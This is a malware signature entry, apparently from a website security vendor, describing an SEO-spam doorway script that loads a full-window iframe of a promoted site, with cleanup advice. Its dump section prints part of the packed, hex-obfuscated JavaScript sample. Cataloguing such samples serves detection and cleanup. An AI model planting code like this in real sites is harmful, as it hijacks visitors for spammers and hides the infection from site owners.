Malware Signatures

  1. Home
  2. Malware Signatures
  3. js.spam-seo.iframe-doorway.004

js.spam-seo.iframe-doorway.004

This script can be found on doorway pages created by hackers. It creates a full window size iframe that loads a third party site (e.g. some e-commerce site that spammers promote). In some cases, hackers inlude this script from third-party servers. Sometimes the origin of the source is cloaked behind a short goo.gl URL.
Variant of iframe-doorways.

Affecting

Any type of site.

Cleanup

You should remove the doorway files. Usually there is also some infected PHP files that make doorways work differently for bots and human visitors. You can contact Sucuri to help you with the infection removal.

Dump

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c]);return p;}('P h$=["\s\g\g\s\j\a","\l\g\j","\A\l\r\g\g","\y\b\c\s","\B\p\c","\r\g\i\y\g\i","\s\g","\p\a\l\o\q\r\a\c\s\b\c\a","\l\j\i\l\E\b\p\i\l","\s\g\i\g","\a\f\q\b\i\a","\p\j\b\d\a\o","\B\z\p\b\q\p\a\l\o ...skipped...
(h$[1m])>n||k["\b\c\d\a\f\m\e"](h$[1k])>n||k["\b\c\d\a\f\m\e"](h$[1h])>n){N["\d\g\q\z\B\a\c\i"]["\x\o\b\i\a\j\c"](h$[1i])}',62,85,'||||||||||x65|x69|x6e|x64|x66|x78|x6f|_|x74|x6c|ddd0|x61|x4f|0x0|x72|x73|x63|x68|x67|x3a|x3b|x70|x30|x77|x62|x75|x79|x6d|x3d|x20|x76|x6b|x31|x2d|x2f|x3e|x3c|x25|x2e|window|x33|var|x7a|x34|x53|x52|x35|x37|x32|x23|x6a|if|||||||||||23|24|25|20|21|22|26|30|31|x4d|29|27|28'.split('|'),0,{}))